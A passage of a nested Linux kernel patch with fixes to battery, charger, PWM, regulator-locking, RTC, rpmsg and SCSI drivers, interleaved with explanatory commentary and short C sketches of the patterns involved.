+ 		.driver_data = &quirk_s2idle_bug,
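
The thinkpad_acpi hunk adds the ThinkPad T14s Gen 1 AMD to the s2idle quirk list. Lenovo encodes the machine type in the first four characters of DMI_PRODUCT_NAME ("20UJ" here), and DMI_MATCH() is a substring match, so the short prefix covers every submodel. A hedged sketch of how such a table is typically consumed (apply_quirk() is hypothetical):

        #include <linux/dmi.h>

        const struct dmi_system_id *id = dmi_first_match(fwbug_list);
        if (id)
                apply_quirk(id->driver_data);   /* -> &quirk_s2idle_bug */
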
+diff --git a/drivers/power/supply/generic-adc-battery.c b/drivers/power/supply/generic-adc-battery.c
+index 66039c665dd1e..0af536f4932f1 100644
+--- a/drivers/power/supply/generic-adc-battery.c
++++ b/drivers/power/supply/generic-adc-battery.c
+@@ -135,6 +135,9 @@ static int read_channel(struct gab *adc_bat, enum power_supply_property psp,
+ 			result);
+ 	if (ret < 0)
+ 		pr_err("read channel error\n");
++	else
++		*result *= 1000;
++
+ 	return ret;
+ }
+ 
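
The generic-adc-battery fix above is a unit mismatch: iio_read_channel_processed() yields processed values in IIO's canonical units (millivolts/milliamps for voltage and current channels), while the power-supply class ABI reports voltage and current properties in micro-units, so every successful read must be scaled by 1000. A minimal sketch, assuming a channel whose processed unit is mV:

        int ret;

        ret = iio_read_channel_processed(channel, result);
        if (ret < 0)
                return ret;
        *result *= 1000;        /* mV -> µV for the power-supply class */
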
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index 36f807b5ec442..f1b431aa0e4f2 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -335,6 +335,20 @@ static int rk817_bat_calib_cap(struct rk817_charger *charger)
+ 			charger->fcc_mah * 1000);
+ 	}
+ 
++	/*
++	 * Set the SOC to 0 if we are below the minimum system voltage.
++	 */
++	if (volt_avg <= charger->bat_voltage_min_design_uv) {
++		charger->soc = 0;
++		charge_now_adc = CHARGE_TO_ADC(0, charger->res_div);
++		put_unaligned_be32(charge_now_adc, bulk_reg);
++		regmap_bulk_write(rk808->regmap,
++				  RK817_GAS_GAUGE_Q_INIT_H3, bulk_reg, 4);
++		dev_warn(charger->dev,
++			 "Battery voltage %d below minimum voltage %d\n",
++			 volt_avg, charger->bat_voltage_min_design_uv);
++		}
++
+ 	rk817_record_battery_nvram_values(charger);
+ 
+ 	return 0;
+@@ -710,9 +724,10 @@ static int rk817_read_battery_nvram_values(struct rk817_charger *charger)
+ 
+ 	/*
+ 	 * Read the nvram for state of charge. Sanity check for values greater
+-	 * than 100 (10000). If the value is off it should get corrected
+-	 * automatically when the voltage drops to the min (soc is 0) or when
+-	 * the battery is full (soc is 100).
++	 * than 100 (10000) or less than 0, because other things (BSP kernels,
++	 * U-Boot, or even i2cset) can write to this register. If the value is
++	 * off it should get corrected automatically when the voltage drops to
++	 * the min (soc is 0) or when the battery is full (soc is 100).
+ 	 */
+ 	ret = regmap_bulk_read(charger->rk808->regmap,
+ 			       RK817_GAS_GAUGE_BAT_R1, bulk_reg, 3);
+@@ -721,6 +736,8 @@ static int rk817_read_battery_nvram_values(struct rk817_charger *charger)
+ 	charger->soc = get_unaligned_le24(bulk_reg);
+ 	if (charger->soc > 10000)
+ 		charger->soc = 10000;
++	if (charger->soc < 0)
++		charger->soc = 0;
+ 
+ 	return 0;
+ }
+@@ -731,8 +748,8 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ {
+ 	struct rk808 *rk808 = charger->rk808;
+ 	u8 bulk_reg[4];
+-	u32 boot_voltage, boot_charge_mah, tmp;
+-	int ret, reg, off_time;
++	u32 boot_voltage, boot_charge_mah;
++	int ret, reg, off_time, tmp;
+ 	bool first_boot;
+ 
+ 	/*
+@@ -785,10 +802,12 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 				 bulk_reg, 4);
+ 		tmp = get_unaligned_be32(bulk_reg);
++		if (tmp < 0)
++			tmp = 0;
+ 		boot_charge_mah = ADC_TO_CHARGE_UAH(tmp,
+ 						    charger->res_div) / 1000;
+ 		/*
+-		 * Check if the columb counter has been off for more than 300
++		 * Check if the columb counter has been off for more than 30
+ 		 * minutes as it tends to drift downward. If so, re-init soc
+ 		 * with the boot voltage instead. Note the unit values for the
+ 		 * OFF_CNT register appear to be in decaminutes and stops
+@@ -799,7 +818,7 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		 * than 0 on a reboot anyway.
+ 		 */
+ 		regmap_read(rk808->regmap, RK817_GAS_GAUGE_OFF_CNT, &off_time);
+-		if (off_time >= 30) {
++		if (off_time >= 3) {
+ 			regmap_bulk_read(rk808->regmap,
+ 					 RK817_GAS_GAUGE_PWRON_VOL_H,
+ 					 bulk_reg, 2);
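
Three related robustness fixes in rk817_charger above: the coulomb counter and nvram SOC are signed quantities that other software (BSP kernels, U-Boot, even i2cset) may have corrupted, so tmp changes from u32 to int and both values are clamped; SOC is forced to 0 whenever the averaged voltage is at or below the design minimum; and the OFF_CNT threshold drops from 30 to 3 because that register counts decaminutes, making a 30-minute cutoff 3 units rather than 30. The clamping amounts to (sketch; SOC is stored in hundredths of a percent, so 10000 == 100.00%):

        #include <linux/minmax.h>

        charger->soc = clamp(charger->soc, 0, 10000);
        if (tmp < 0)            /* counter can drift negative */
                tmp = 0;
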
+diff --git a/drivers/pwm/pwm-meson.c b/drivers/pwm/pwm-meson.c
+index 5cd7b90872c62..5732300eb0046 100644
+--- a/drivers/pwm/pwm-meson.c
++++ b/drivers/pwm/pwm-meson.c
+@@ -418,7 +418,7 @@ static const struct meson_pwm_data pwm_axg_ee_data = {
+ };
+ 
+ static const char * const pwm_axg_ao_parent_names[] = {
+-	"aoclk81", "xtal", "fclk_div4", "fclk_div5"
++	"xtal", "axg_ao_clk81", "fclk_div4", "fclk_div5"
+ };
+ 
+ static const struct meson_pwm_data pwm_axg_ao_data = {
+@@ -427,7 +427,7 @@ static const struct meson_pwm_data pwm_axg_ao_data = {
+ };
+ 
+ static const char * const pwm_g12a_ao_ab_parent_names[] = {
+-	"xtal", "aoclk81", "fclk_div4", "fclk_div5"
++	"xtal", "g12a_ao_clk81", "fclk_div4", "fclk_div5"
+ };
+ 
+ static const struct meson_pwm_data pwm_g12a_ao_ab_data = {
+@@ -436,7 +436,7 @@ static const struct meson_pwm_data pwm_g12a_ao_ab_data = {
+ };
+ 
+ static const char * const pwm_g12a_ao_cd_parent_names[] = {
+-	"xtal", "aoclk81",
++	"xtal", "g12a_ao_clk81",
+ };
+ 
+ static const struct meson_pwm_data pwm_g12a_ao_cd_data = {
+diff --git a/drivers/pwm/pwm-mtk-disp.c b/drivers/pwm/pwm-mtk-disp.c
+index ccf0ccdef29df..3811578fcff05 100644
+--- a/drivers/pwm/pwm-mtk-disp.c
++++ b/drivers/pwm/pwm-mtk-disp.c
+@@ -138,6 +138,19 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	high_width = mul_u64_u64_div_u64(state->duty_cycle, rate, div);
+ 	value = period | (high_width << PWM_HIGH_WIDTH_SHIFT);
+ 
++	if (mdp->data->bls_debug && !mdp->data->has_commit) {
++		/*
++		 * For MT2701, disable double buffer before writing register
++		 * and select manual mode and use PWM_PERIOD/PWM_HIGH_WIDTH.
++		 */
++		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
++					 mdp->data->bls_debug_mask,
++					 mdp->data->bls_debug_mask);
++		mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
++					 mdp->data->con0_sel,
++					 mdp->data->con0_sel);
++	}
++
+ 	mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
+ 				 PWM_CLKDIV_MASK,
+ 				 clk_div << PWM_CLKDIV_SHIFT);
+@@ -152,17 +165,6 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		mtk_disp_pwm_update_bits(mdp, mdp->data->commit,
+ 					 mdp->data->commit_mask,
+ 					 0x0);
+-	} else {
+-		/*
+-		 * For MT2701, disable double buffer before writing register
+-		 * and select manual mode and use PWM_PERIOD/PWM_HIGH_WIDTH.
+-		 */
+-		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
+-					 mdp->data->bls_debug_mask,
+-					 mdp->data->bls_debug_mask);
+-		mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
+-					 mdp->data->con0_sel,
+-					 mdp->data->con0_sel);
+ 	}
+ 
+ 	mtk_disp_pwm_update_bits(mdp, DISP_PWM_EN, mdp->data->enable_mask,
+@@ -194,6 +196,16 @@ static int mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ 		return 0;
+ 	}
+ 
++	/*
++	 * Apply DISP_PWM_DEBUG settings to choose whether to enable or disable
++	 * registers double buffer and manual commit to working register before
++	 * performing any read/write operation
++	 */
++	if (mdp->data->bls_debug)
++		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
++					 mdp->data->bls_debug_mask,
++					 mdp->data->bls_debug_mask);
++
+ 	rate = clk_get_rate(mdp->clk_main);
+ 	con0 = readl(mdp->base + mdp->data->con0);
+ 	con1 = readl(mdp->base + mdp->data->con1);
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index cdac193634e07..c417eae887b2d 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -207,6 +207,78 @@ static void regulator_unlock(struct regulator_dev *rdev)
+ 	mutex_unlock(&regulator_nesting_mutex);
+ }
+ 
++/**
++ * regulator_lock_two - lock two regulators
++ * @rdev1:		first regulator
++ * @rdev2:		second regulator
++ * @ww_ctx:		w/w mutex acquire context
++ *
++ * Locks both rdevs using the regulator_ww_class.
++ */
++static void regulator_lock_two(struct regulator_dev *rdev1,
++			       struct regulator_dev *rdev2,
++			       struct ww_acquire_ctx *ww_ctx)
++{
++	struct regulator_dev *tmp;
++	int ret;
++
++	ww_acquire_init(ww_ctx, &regulator_ww_class);
++
++	/* Try to just grab both of them */
++	ret = regulator_lock_nested(rdev1, ww_ctx);
++	WARN_ON(ret);
++	ret = regulator_lock_nested(rdev2, ww_ctx);
++	if (ret != -EDEADLOCK) {
++		WARN_ON(ret);
++		goto exit;
++	}
++
++	while (true) {
++		/*
++		 * Start of loop: rdev1 was locked and rdev2 was contended.
++		 * Need to unlock rdev1, slowly lock rdev2, then try rdev1
++		 * again.
++		 */
++		regulator_unlock(rdev1);
++
++		ww_mutex_lock_slow(&rdev2->mutex, ww_ctx);
++		rdev2->ref_cnt++;
++		rdev2->mutex_owner = current;
++		ret = regulator_lock_nested(rdev1, ww_ctx);
++
++		if (ret == -EDEADLOCK) {
++			/* More contention; swap which needs to be slow */
++			tmp = rdev1;
++			rdev1 = rdev2;
++			rdev2 = tmp;
++		} else {
++			WARN_ON(ret);
++			break;
++		}
++	}
++
++exit:
++	ww_acquire_done(ww_ctx);
++}
++
++/**
++ * regulator_unlock_two - unlock two regulators
++ * @rdev1:		first regulator
++ * @rdev2:		second regulator
++ * @ww_ctx:		w/w mutex acquire context
++ *
++ * The inverse of regulator_lock_two().
++ */
++
++static void regulator_unlock_two(struct regulator_dev *rdev1,
++				 struct regulator_dev *rdev2,
++				 struct ww_acquire_ctx *ww_ctx)
++{
++	regulator_unlock(rdev2);
++	regulator_unlock(rdev1);
++	ww_acquire_fini(ww_ctx);
++}
++
+ static bool regulator_supply_is_couple(struct regulator_dev *rdev)
+ {
+ 	struct regulator_dev *c_rdev;
+@@ -334,6 +406,7 @@ static void regulator_lock_dependent(struct regulator_dev *rdev,
+ 			ww_mutex_lock_slow(&new_contended_rdev->mutex, ww_ctx);
+ 			old_contended_rdev = new_contended_rdev;
+ 			old_contended_rdev->ref_cnt++;
++			old_contended_rdev->mutex_owner = current;
+ 		}
+ 
+ 		err = regulator_lock_recursive(rdev,
+@@ -1583,9 +1656,6 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 			rdev->constraints->always_on = true;
+ 	}
+ 
+-	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get_boottime();
+-
+ 	/* If the constraints say the regulator should be on at this point
+ 	 * and we have control then make sure it is enabled.
+ 	 */
+@@ -1619,6 +1689,8 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 
+ 		if (rdev->constraints->always_on)
+ 			rdev->use_count++;
++	} else if (rdev->desc->off_on_delay) {
++		rdev->last_off = ktime_get();
+ 	}
+ 
+ 	print_constraints(rdev);
+@@ -1627,8 +1699,8 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 
+ /**
+  * set_supply - set regulator supply regulator
+- * @rdev: regulator name
+- * @supply_rdev: supply regulator name
++ * @rdev: regulator (locked)
++ * @supply_rdev: supply regulator (locked))
+  *
+  * Called by platform initialisation code to set the supply regulator for this
+  * regulator. This ensures that a regulators supply will also be enabled by the
+@@ -1800,6 +1872,8 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 	struct regulator *regulator;
+ 	int err = 0;
+ 
++	lockdep_assert_held_once(&rdev->mutex.base);
++
+ 	if (dev) {
+ 		char buf[REG_STR_SIZE];
+ 		int size;
+@@ -1827,9 +1901,7 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 	regulator->rdev = rdev;
+ 	regulator->supply_name = supply_name;
+ 
+-	regulator_lock(rdev);
+ 	list_add(&regulator->list, &rdev->consumer_list);
+-	regulator_unlock(rdev);
+ 
+ 	if (dev) {
+ 		regulator->dev = dev;
+@@ -1995,6 +2067,7 @@ static int regulator_resolve_supply(struct regulator_dev *rdev)
+ {
+ 	struct regulator_dev *r;
+ 	struct device *dev = rdev->dev.parent;
++	struct ww_acquire_ctx ww_ctx;
+ 	int ret = 0;
+ 
+ 	/* No supply to resolve? */
+@@ -2061,23 +2134,23 @@ static int regulator_resolve_supply(struct regulator_dev *rdev)
+ 	 * between rdev->supply null check and setting rdev->supply in
+ 	 * set_supply() from concurrent tasks.
+ 	 */
+-	regulator_lock(rdev);
++	regulator_lock_two(rdev, r, &ww_ctx);
+ 
+ 	/* Supply just resolved by a concurrent task? */
+ 	if (rdev->supply) {
+-		regulator_unlock(rdev);
++		regulator_unlock_two(rdev, r, &ww_ctx);
+ 		put_device(&r->dev);
+ 		goto out;
+ 	}
+ 
+ 	ret = set_supply(rdev, r);
+ 	if (ret < 0) {
+-		regulator_unlock(rdev);
++		regulator_unlock_two(rdev, r, &ww_ctx);
+ 		put_device(&r->dev);
+ 		goto out;
+ 	}
+ 
+-	regulator_unlock(rdev);
++	regulator_unlock_two(rdev, r, &ww_ctx);
+ 
+ 	/*
+ 	 * In set_machine_constraints() we may have turned this regulator on
+@@ -2190,7 +2263,9 @@ struct regulator *_regulator_get(struct device *dev, const char *id,
+ 		return regulator;
+ 	}
+ 
++	regulator_lock(rdev);
+ 	regulator = create_regulator(rdev, dev, id);
++	regulator_unlock(rdev);
+ 	if (regulator == NULL) {
+ 		regulator = ERR_PTR(-ENOMEM);
+ 		module_put(rdev->owner);
+@@ -2668,7 +2743,7 @@ static int _regulator_do_enable(struct regulator_dev *rdev)
+ 
+ 	trace_regulator_enable(rdev_get_name(rdev));
+ 
+-	if (rdev->desc->off_on_delay && rdev->last_off) {
++	if (rdev->desc->off_on_delay) {
+ 		/* if needed, keep a distance of off_on_delay from last time
+ 		 * this regulator was disabled.
+ 		 */
+@@ -6043,6 +6118,7 @@ static void regulator_summary_lock(struct ww_acquire_ctx *ww_ctx)
+ 			ww_mutex_lock_slow(&new_contended_rdev->mutex, ww_ctx);
+ 			old_contended_rdev = new_contended_rdev;
+ 			old_contended_rdev->ref_cnt++;
++			old_contended_rdev->mutex_owner = current;
+ 		}
+ 
+ 		err = regulator_summary_lock_all(ww_ctx,
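
regulator_lock_two() above is the standard wound/wait two-mutex dance: optimistically take both locks; if the second returns -EDEADLOCK (== -EDEADLK on practically all architectures), drop the first, take the contended one with ww_mutex_lock_slow(), which sleeps until the lock can be granted without deadlock, then retry with the roles swapped. Stripped of the regulator bookkeeping (ref_cnt/mutex_owner), the pattern looks like this (sketch; my_ww_class is hypothetical):

        #include <linux/ww_mutex.h>

        static DEFINE_WW_CLASS(my_ww_class);

        static void lock_pair(struct ww_mutex *a, struct ww_mutex *b,
                              struct ww_acquire_ctx *ctx)
        {
                struct ww_mutex *tmp;

                ww_acquire_init(ctx, &my_ww_class);

                ww_mutex_lock(a, ctx);                  /* holds nothing: cannot deadlock */
                while (ww_mutex_lock(b, ctx) == -EDEADLK) {
                        ww_mutex_unlock(a);             /* back off */
                        ww_mutex_lock_slow(b, ctx);     /* wait our turn for b */
                        tmp = a; a = b; b = tmp;        /* retry the other lock */
                }
                ww_acquire_done(ctx);
        }

The companion hunks that set rdev->mutex_owner after ww_mutex_lock_slow() keep the core's recursive-locking accounting consistent on the slow path, and create_regulator() now asserts that the caller already holds rdev->mutex instead of taking it itself (see the new lock/unlock pair in _regulator_get()).
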
+diff --git a/drivers/regulator/stm32-pwr.c b/drivers/regulator/stm32-pwr.c
+index 2a42acb7c24e9..e5dd4db6403b2 100644
+--- a/drivers/regulator/stm32-pwr.c
++++ b/drivers/regulator/stm32-pwr.c
+@@ -129,17 +129,16 @@ static const struct regulator_desc stm32_pwr_desc[] = {
+ 
+ static int stm32_pwr_regulator_probe(struct platform_device *pdev)
+ {
+-	struct device_node *np = pdev->dev.of_node;
+ 	struct stm32_pwr_reg *priv;
+ 	void __iomem *base;
+ 	struct regulator_dev *rdev;
+ 	struct regulator_config config = { };
+ 	int i, ret = 0;
+ 
+-	base = of_iomap(np, 0);
+-	if (!base) {
++	base = devm_platform_ioremap_resource(pdev, 0);
++	if (IS_ERR(base)) {
+ 		dev_err(&pdev->dev, "Unable to map IO memory\n");
+-		return -ENOMEM;
++		return PTR_ERR(base);
+ 	}
+ 
+ 	config.dev = &pdev->dev;
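
The stm32-pwr probe conversion fixes two things at once: devm_platform_ioremap_resource() both requests the memory region and unmaps/releases it automatically on probe failure or unbind (the old of_iomap() mapping was never unmapped), and its error convention differs, returning an ERR_PTR rather than NULL, which is why the check flips from !base to IS_ERR(base):

        void __iomem *base = devm_platform_ioremap_resource(pdev, 0);
        if (IS_ERR(base))
                return PTR_ERR(base);   /* ERR_PTR convention, not NULL */
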
+diff --git a/drivers/rpmsg/qcom_glink_native.c b/drivers/rpmsg/qcom_glink_native.c
+index 35df1b0a515bf..67e7664efb0dc 100644
+--- a/drivers/rpmsg/qcom_glink_native.c
++++ b/drivers/rpmsg/qcom_glink_native.c
+@@ -1348,8 +1348,9 @@ static int __qcom_glink_send(struct glink_channel *channel,
+ 	ret = qcom_glink_tx(glink, &req, sizeof(req), data, chunk_size, wait);
+ 
+ 	/* Mark intent available if we failed */
+-	if (ret && intent) {
+-		intent->in_use = false;
++	if (ret) {
++		if (intent)
++			intent->in_use = false;
+ 		return ret;
+ 	}
+ 
+@@ -1370,8 +1371,9 @@ static int __qcom_glink_send(struct glink_channel *channel,
+ 				    chunk_size, wait);
+ 
+ 		/* Mark intent available if we failed */
+-		if (ret && intent) {
+-			intent->in_use = false;
++		if (ret) {
++			if (intent)
++				intent->in_use = false;
+ 			break;
+ 		}
+ 	}
+diff --git a/drivers/rtc/rtc-meson-vrtc.c b/drivers/rtc/rtc-meson-vrtc.c
+index 1463c86215615..648fa362ec447 100644
+--- a/drivers/rtc/rtc-meson-vrtc.c
++++ b/drivers/rtc/rtc-meson-vrtc.c
+@@ -23,7 +23,7 @@ static int meson_vrtc_read_time(struct device *dev, struct rtc_time *tm)
+ 	struct timespec64 time;
+ 
+ 	dev_dbg(dev, "%s\n", __func__);
+-	ktime_get_raw_ts64(&time);
++	ktime_get_real_ts64(&time);
+ 	rtc_time64_to_tm(time.tv_sec, tm);
+ 
+ 	return 0;
+@@ -96,7 +96,7 @@ static int __maybe_unused meson_vrtc_suspend(struct device *dev)
+ 		long alarm_secs;
+ 		struct timespec64 time;
+ 
+-		ktime_get_raw_ts64(&time);
++		ktime_get_real_ts64(&time);
+ 		local_time = time.tv_sec;
+ 
+ 		dev_dbg(dev, "alarm_time = %lus, local_time=%lus\n",
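
The meson-vrtc change swaps the clock source: ktime_get_raw_ts64() reads raw monotonic time, which starts near zero at boot and ignores NTP corrections, so the virtual RTC was reporting time-since-boot rather than calendar time. ktime_get_real_ts64() reads CLOCK_REALTIME, the wall clock an RTC is expected to expose:

        struct timespec64 ts;

        ktime_get_real_ts64(&ts);          /* seconds since the Unix epoch */
        rtc_time64_to_tm(ts.tv_sec, tm);
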
+diff --git a/drivers/rtc/rtc-omap.c b/drivers/rtc/rtc-omap.c
+index 4d4f3b1a73093..73634a3ccfd3b 100644
+--- a/drivers/rtc/rtc-omap.c
++++ b/drivers/rtc/rtc-omap.c
+@@ -25,6 +25,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/rtc.h>
++#include <linux/rtc/rtc-omap.h>
+ 
+ /*
+  * The OMAP RTC is a year/month/day/hours/minutes/seconds BCD clock
+diff --git a/drivers/rtc/rtc-ti-k3.c b/drivers/rtc/rtc-ti-k3.c
+index ba23163cc0428..0d90fe9233550 100644
+--- a/drivers/rtc/rtc-ti-k3.c
++++ b/drivers/rtc/rtc-ti-k3.c
+@@ -632,7 +632,8 @@ static int __maybe_unused ti_k3_rtc_suspend(struct device *dev)
+ 	struct ti_k3_rtc *priv = dev_get_drvdata(dev);
+ 
+ 	if (device_may_wakeup(dev))
+-		enable_irq_wake(priv->irq);
++		return enable_irq_wake(priv->irq);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index 5a6d9c15395f7..bce3422d85640 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -2941,7 +2941,7 @@ static int _dasd_requeue_request(struct dasd_ccw_req *cqr)
+ 		return 0;
+ 	spin_lock_irq(&cqr->dq->lock);
+ 	req = (struct request *) cqr->callback_data;
+-	blk_mq_requeue_request(req, false);
++	blk_mq_requeue_request(req, true);
+ 	spin_unlock_irq(&cqr->dq->lock);
+ 
+ 	return 0;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
+index d643c5a49aa94..70c24377c6a19 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
+@@ -1258,7 +1258,11 @@ static void slot_complete_v1_hw(struct hisi_hba *hisi_hba,
+ 
+ 		slot_err_v1_hw(hisi_hba, task, slot);
+ 		if (unlikely(slot->abort)) {
+-			sas_task_abort(task);
++			if (dev_is_sata(device) && task->ata_task.use_ncq)
++				sas_ata_device_link_abort(device, true);
++			else
++				sas_task_abort(task);
++
+ 			return;
+ 		}
+ 		goto out;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+index cded42f4ca445..02575d81afca2 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+@@ -2404,7 +2404,11 @@ static void slot_complete_v2_hw(struct hisi_hba *hisi_hba,
+ 				 error_info[2], error_info[3]);
+ 
+ 		if (unlikely(slot->abort)) {
+-			sas_task_abort(task);
++			if (dev_is_sata(device) && task->ata_task.use_ncq)
++				sas_ata_device_link_abort(device, true);
++			else
++				sas_task_abort(task);
++
+ 			return;
+ 		}
+ 		goto out;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index 620dcefe7b6f4..e8a3511040af2 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -2293,7 +2293,11 @@ static void slot_complete_v3_hw(struct hisi_hba *hisi_hba,
+ 					error_info[0], error_info[1],
+ 					error_info[2], error_info[3]);
+ 			if (unlikely(slot->abort)) {
+-				sas_task_abort(task);
++				if (dev_is_sata(device) && task->ata_task.use_ncq)
++					sas_ata_device_link_abort(device, true);
++				else
++					sas_task_abort(task);
++
+ 				return;
+ 			}
+ 			goto out;
+diff --git a/drivers/scsi/libsas/sas_ata.c b/drivers/scsi/libsas/sas_ata.c
+index 2fd55ef9ffca5..6b045be947b14 100644
+--- a/drivers/scsi/libsas/sas_ata.c
++++ b/drivers/scsi/libsas/sas_ata.c
+@@ -886,6 +886,24 @@ void sas_ata_wait_eh(struct domain_device *dev)
+ 	ata_port_wait_eh(ap);
+ }
+ 
++void sas_ata_device_link_abort(struct domain_device *device, bool force_reset)
++{
++	struct ata_port *ap = device->sata_dev.ap;
++	struct ata_link *link = &ap->link;
++	unsigned long flags;
++
++	spin_lock_irqsave(ap->lock, flags);
++	device->sata_dev.fis[2] = ATA_ERR | ATA_DRDY; /* tf status */
++	device->sata_dev.fis[3] = ATA_ABORTED; /* tf error */
++
++	link->eh_info.err_mask |= AC_ERR_DEV;
++	if (force_reset)
++		link->eh_info.action |= ATA_EH_RESET;
++	ata_link_abort(link);
++	spin_unlock_irqrestore(ap->lock, flags);
++}
++EXPORT_SYMBOL_GPL(sas_ata_device_link_abort);
++
+ int sas_execute_ata_cmd(struct domain_device *device, u8 *fis, int force_phy_id)
+ {
+ 	struct sas_tmf_task tmf_task = {};
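
sas_ata_device_link_abort() gives LLDDs (used by the three hisi_sas hunks above) a way to hand a failed NCQ command to libata's error handler: under NCQ a single device error aborts every outstanding command on the link, so per-task sas_task_abort() is the wrong granularity. The helper fabricates an error D2H FIS (status ATA_ERR | ATA_DRDY, error ATA_ABORTED), flags AC_ERR_DEV, optionally requests ATA_EH_RESET, and kicks ata_link_abort(). The call shape, as in the hisi_sas completion paths:

        if (dev_is_sata(device) && task->ata_task.use_ncq)
                sas_ata_device_link_abort(device, true);  /* force link reset */
        else
                sas_task_abort(task);
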
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index 2f38c8d5a48a9..d54fd153cb115 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -11971,7 +11971,7 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 				goto out_iounmap_all;
+ 		} else {
+ 			error = -ENOMEM;
+-			goto out_iounmap_all;
++			goto out_iounmap_ctrl;
+ 		}
+ 	}
+ 
+@@ -11989,7 +11989,7 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 			dev_err(&pdev->dev,
+ 			   "ioremap failed for SLI4 HBA dpp registers.\n");
+ 			error = -ENOMEM;
+-			goto out_iounmap_ctrl;
++			goto out_iounmap_all;
+ 		}
+ 		phba->pci_bar4_memmap_p = phba->sli4_hba.dpp_regs_memmap_p;
+ 	}
+@@ -12014,9 +12014,11 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 	return 0;
+ 
+ out_iounmap_all:
+-	iounmap(phba->sli4_hba.drbl_regs_memmap_p);
++	if (phba->sli4_hba.drbl_regs_memmap_p)
++		iounmap(phba->sli4_hba.drbl_regs_memmap_p);
+ out_iounmap_ctrl:
+-	iounmap(phba->sli4_hba.ctrl_regs_memmap_p);
++	if (phba->sli4_hba.ctrl_regs_memmap_p)
++		iounmap(phba->sli4_hba.ctrl_regs_memmap_p);
+ out_iounmap_conf:
+ 	iounmap(phba->sli4_hba.conf_regs_memmap_p);
+ 
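
The lpfc fix is a textbook goto-unwind correction: error labels must undo, in reverse order, exactly what had succeeded before the jump. The old code jumped to out_iounmap_all before drbl_regs_memmap_p was mapped (unmapping a stale pointer) and to out_iounmap_ctrl after it was (leaking it); the retargeted gotos plus the NULL checks restore the invariant. The canonical shape, with hypothetical names:

        static int map_regs(struct foo *f)
        {
                int ret;

                f->a = ioremap(A_BASE, A_LEN);
                if (!f->a)
                        return -ENOMEM;

                f->b = ioremap(B_BASE, B_LEN);
                if (!f->b) {
                        ret = -ENOMEM;
                        goto unmap_a;           /* b never mapped: don't unmap it */
                }

                ret = probe_hw(f);              /* hypothetical final step */
                if (ret)
                        goto unmap_b;           /* both mapped: unwind both */

                return 0;

        unmap_b:
                iounmap(f->b);
        unmap_a:
                iounmap(f->a);
                return ret;
        }
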
+diff --git a/drivers/scsi/megaraid.c b/drivers/scsi/megaraid.c
+index bf491af9f0d65..16e2cf848c6ef 100644
+--- a/drivers/scsi/megaraid.c
++++ b/drivers/scsi/megaraid.c
+@@ -1441,6 +1441,7 @@ mega_cmd_done(adapter_t *adapter, u8 completed[], int nstatus, int status)
+ 		 */
+ 		if (cmdid == CMDID_INT_CMDS) {
+ 			scb = &adapter->int_scb;
++			cmd = scb->cmd;
+ 
+ 			list_del_init(&scb->list);
+ 			scb->state = SCB_FREE;
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index ea9e69fb62826..64355d0baa5fb 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -2526,7 +2526,7 @@ static void mpi3mr_watchdog_work(struct work_struct *work)
+ 		mrioc->unrecoverable = 1;
+ 		goto schedule_work;
+ 	case MPI3_SYSIF_FAULT_CODE_SOFT_RESET_IN_PROGRESS:
+-		return;
++		goto schedule_work;
+ 	case MPI3_SYSIF_FAULT_CODE_CI_ACTIVATION_RESET:
+ 		reset_reason = MPI3MR_RESET_FROM_CIACTIV_FAULT;
+ 		break;
